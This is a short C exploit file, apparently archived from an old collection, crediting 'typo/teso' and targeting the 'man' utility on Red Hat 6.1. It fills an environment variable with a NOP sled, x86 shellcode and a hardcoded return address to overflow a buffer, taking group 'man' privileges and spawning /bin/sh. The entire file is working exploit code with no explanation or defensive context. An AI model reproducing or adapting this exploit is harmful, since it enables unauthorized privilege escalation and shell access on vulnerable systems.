home *** CD-ROM | disk | FTP | other *** search
- <html>#include <stdio.h>
- #include <stdlib.h>
- #include <string.h>
- #include <unistd.h>
-
- #define OFFSET 0xbfffb32e
- #define LEN 4061
-
- #define GID "15" /* man::15: on rh6.1 */
-
- unsigned char shellcode[] =
- "\x31\xc0\x31\xdb\x31\xc9\xb3"GID"\xb1"GID"\xb0\x47\xcd\x80\xeb\x1e"
- "\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\x8d\x4b\x08\x8d\x53"
- "\x0c\xb0\x0b\xcd\x80\x89\xc3\x31\xc0\xb0\x01\xcd\x80\xe8\xdd\xff\xff"
- "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x74\x65\x73\x6f\x63\x72\x65\x77\x21"
- "\x21";
-
- /* man sploit by typo/teso (typo@inferno.tusculum.edu) */
- int main(int argc, char *argv[])
- {
- int offset = argc > 1 ? atoi(argv[1]) + OFFSET : OFFSET;
- int eob = argc > 2 ? atoi(argv[2]) : LEN;
- char *buffer;
-
- printf("eob = %d, offset = 0x%x\n", eob, offset);
- buffer = malloc(eob+8);
-
- memset(buffer, 0x90, eob);
- memcpy(buffer + eob - strlen(shellcode) - 8, shellcode, strlen(shellcode));
- memcpy(buffer + eob - 4, &offset, 4);
- buffer[eob] = '\0';
-
- setenv("MANPAGER", buffer, 1);
- execlp("man", "man", "man", NULL);
- }
-
-
